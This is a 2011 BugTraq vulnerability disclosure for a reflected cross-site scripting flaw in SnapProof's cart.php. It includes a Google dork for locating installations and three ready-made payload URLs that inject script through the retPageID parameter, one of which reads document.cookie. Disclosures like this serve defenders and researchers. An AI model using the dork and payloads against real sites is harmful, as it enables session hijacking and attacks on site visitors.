BugTraq
SnapProof (cart.php) Cross Site Scripting Mar 01 2011 04:20AM
difficult-511 hotmail com
##########################################################
# Exploit Title: SnapProof (cart.php) Cross Site Scripting
# Google Dork: inurl:"Created and powered by SnapProof"
# home : www.D99Y.com
# Date: 1/3/2011
# Author: Difficult 511
# Software Link: http://www.snapproof.com/
##########################################################
#
# file :
#
# cart.php
#
# exploit :
#
# http://localhost/cart.php?retPageID= [ XSS ]
#
# http://localhost/cart.php?retPageID=<script>alert(12345)</script>
#
# http://localhost/cart.php?retPageID=<script>alert(document.cookie)</scri
pt>
#
##########################################################

Greetz :

NassRawI and all members D99Y.com

Enjoy :)

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus